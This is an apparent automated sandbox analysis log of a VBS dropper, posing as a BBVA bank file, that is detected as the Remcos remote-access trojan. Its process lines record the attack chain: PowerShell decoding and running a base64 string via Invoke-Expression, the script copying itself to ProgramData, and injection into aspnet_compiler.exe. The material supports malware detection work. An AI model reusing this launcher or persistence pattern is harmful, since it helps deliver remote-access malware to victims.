Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@19/12@5/4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,21_2_00416AB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,21_2_0040E219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,21_2_0041A63F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,21_2_00419BC4
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\VBScripting
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmcghghyrtssxr-7RL1P2
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2052:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhonk0up.qgt.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe C:\ProgramData\haematachometer.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: policymanager.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: sppc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
